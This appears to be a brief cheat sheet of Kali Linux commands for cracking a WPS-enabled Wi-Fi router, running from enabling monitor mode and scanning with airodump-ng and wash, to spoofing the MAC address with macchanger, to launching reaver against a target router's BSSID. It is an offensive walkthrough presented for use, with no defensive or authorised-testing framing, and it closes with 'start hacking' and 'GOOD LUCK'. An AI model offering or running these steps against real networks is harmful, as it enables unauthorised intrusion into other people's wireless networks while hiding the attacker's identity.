You are on page 1of 1

oot@kali:~# airmon-ng (check your wireless network card)

root@kali:~# airmon-ng start wlan0 (enable the monitor mode)


root@kali:~# airodump-ng mon0 (listen to wireless networks)
root@kali:~# wash -i mon0 (search for wps routers, in unlocked state)
root@kali:~# airmon-ng stop mon0 (remove mon0 interface)
root@kali:~# airmon-ng stop wlan0 (disable monitor mode)
root@kali:~# ifconfig wlan0 down (wireless card down)
root@kali:~# macchanger -r wlan0 (change your mac)
root@kali:~# ifconfig wlan0 up (wake up wireless card)
root@kali:~# airmon-ng (check your wireless network card)
root@kali:~# airmon-ng start wlan0 (enable the monitor mode)
root@kali:~# reaver -i mon0 -m "your new mac" -b "target router bssid" -a -vv (
start hacking)
--GOOD LUCK--

You might also like